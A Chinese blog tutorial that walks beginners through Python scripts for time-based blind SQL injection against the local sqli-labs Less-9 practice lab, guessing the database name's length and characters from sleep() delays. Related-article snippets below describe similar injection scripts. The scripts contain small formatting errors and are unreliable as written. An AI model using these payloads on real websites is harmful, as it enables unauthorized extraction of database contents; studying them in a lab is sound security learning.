用py写一个时间盲注的脚本(初学向)

最新推荐文章于 2024-05-02 00:36:59 发布
最新推荐文章于 2024-05-02 00:36:59 发布
阅读量3.4k 收藏
点赞数
文章标签: 数据库 python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62540010/article/details/122800613
版权

用py写一个时间盲注的脚本

1.
首先我们要清楚时间盲注的特点是利用了sql中sleep这个函数,借助的是响应时间不同来判断构造语句的对错,那么我们主要思路就要通过记录响应时间来执行一系列操作,下面是我写的一个简单脚本
2.
import requests
import time
for i in range(1,20):
    url="http://127.0.0.1/sqli/Less-9/?id=1'and if(length(database())={i},1,sleep(5))--+"
    headers={
        'Host': '127.0.0.1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0'}
    real_url=url.format(i)
    start_time=time.time()
    requests.get(real_url,headers=headers)
    if time.time() - start_time < 3:
        print('database length is ' + str(i))
        database_length=i
        break
    else:
        pass

import requests
import time
dataname='abcdefghigklmnopqrstuvwxyz'
database=''
for l in range(1,9):
    for  real_dataname in  dataname :
        url="http://127.0.0.1/sqli/Less-9/?id=1'and if(left((select database()),{l})='"+database+"{1}+',1,sleep(3))--+  "   
        real_url=url.format(l,real_dataname)
        headers={
        'Host': '127.0.0.1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0'}
        start_time=time.time()
        requests.get(real_url,headers=headers)
        if time.time() - start_time < 2:
            database+=real_dataname
            print(database)
            break
        else:
            pass
print('database is'+database)
第一个是判断数据库长度的,第二个是判断数据库的名称的,如果需要判断列和字段的名称,稍加修改即可
3.
现在我们来分析一下这个脚本
3.1首先我们要导入requests模块和time模块,因为我们要利用时间需要用到py的有关时间的函数,requests是我们需要向一个网址发送信息的必要函数
3.2 以判断sql靶场第九关数据库长度为例,我们先构造url(这里是以get方法传参的)和headers,用py中字典的方法,可以用burp抓包得到,然后我们用for循环和.format方法修改url中的变量并赋值给real_url,之后我们用requests.get(real_url,headers=headers)将数据提交,然后我们通过time.time()函数记录当下提交的时间并赋值给start_time变量,然后我们进行if判定,if time.time() - start_time < 2:就执行我们的语句,否则pass掉
3.3 关于执行次数,我这里用的是穷举,还有更好的方法是二分法,我后续会补充上来
Be_immortal
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
时间盲注python脚本.zip
12-28
python时间盲注自动化的脚本
时间盲注脚本(附带注释)
sGanYu
03-22 2774
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
2024年网络安全最新超硬核,SQL注入之时间盲注,原理+步骤+实战思路
最新发布
2401_84252281的博客
05-02 128
如果页面响应时间超过5秒,说明长度判断正确(sleep(5));如果页面响应时间不超过5秒(正常响应),说明长度判断错误,继续递增判断长度。
python脚本实现sql时间盲注
wrypot的博客
03-27 717
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1306
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1594
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
综合bool盲注脚本.py
07-15
可以适用于部分SQL注入题目
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注python脚本,其中语句需要根据环境条件做改变
使用python一个自动浏览文章的脚本实例
01-21
创建python文件fling.py,代码如下: #!/usr/bin/env monkeyrunner import time from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice device = MonkeyRunner.waitForConnection(5) loop = 0 loop_back...
微信跳一跳自动化脚本.py
02-06
一个针对微信跳一跳的自动化脚本,包括识别手机屏幕区域、计算棋子坐标、计算落点坐标以及模拟鼠标对手机屏幕进行按压操作等。 具体细节可参考:https://blog.csdn.net/weixin_40973138/article/details/104190492
浅谈Pycharm调用同级目录下的py脚本bug
09-19
今天小编就为大家分享一篇浅谈Pycharm调用同级目录下的py脚本bug,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 504
时间盲注脚本
Python脚本-时间盲注
m0_74317362的博客
09-23 1035
添加了time.sleep(0.05)
python布尔盲注脚本
kiihuang的博客
03-28 488
使用python,编一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
python脚本时间盲注猜解
qq_36585338的博客
11-26 180
【代码】python脚本时间盲注猜解。
sql注入之时间盲注脚本(python)
npu2022303155的博客
03-31 234
之前看到一个布尔盲注脚本,感觉和时间盲注的逻辑差不多,只是判断条件变化了一下,基本没变化。所以就该了一下脚本。自己第一次做题,脚本跑出来了flag,但是错了中间的一个字符,猜测是时间延迟太小的原因。只是自己用sqlmap找出flag提交后,环境就关闭了,没验证过这个想法。但还是浅浅的记录一下吧。
超硬核,SQL注入之时间盲注,原理+步骤+实战思路
热门推荐
wangyuxiang946的博客
04-15 1万+
延时注入,什么是时间盲注时间盲注原理?时间盲注使用步骤?时间盲注使用场景?时间盲注Python脚本
时间盲注(ctfhub)
2401_82985722的博客
03-29 1003
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
Python的模块导入(已requests库为例)
weixin_46103400的博客
01-26 7165
Python的模块导入(已requests库为例)
securecrt用py一个循环脚本
06-03
好的,以下是一个使用Python的循环脚本,可以在SecureCRT中运行: ```python # 导入必要的模块 import time import crt # 循环次数 loop_count = 10 # 连接信息 host = "127.0.0.1" port = 22 username = "username" password = "password" # 创建SSH连接 crt.Session.Connect("/SSH2 /ACCEPTHOSTKEYS " + username + "@" + host + ":" + str(port)) crt.Screen.Synchronous = True # 循环执行命令 for i in range(loop_count): crt.Screen.Send("ls -l\r\n") time.sleep(1) output = crt.Screen.ReadString("#") crt.Dialog.MessageBox(output) # 断开SSH连接 crt.Session.Disconnect() ``` 请将上述代码复制到SecureCRT的脚本编辑器中,并保存为.py文件。然后在SecureCRT中打开一个SSH会话,并运行这个脚本,即可循环执行命令并显示输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值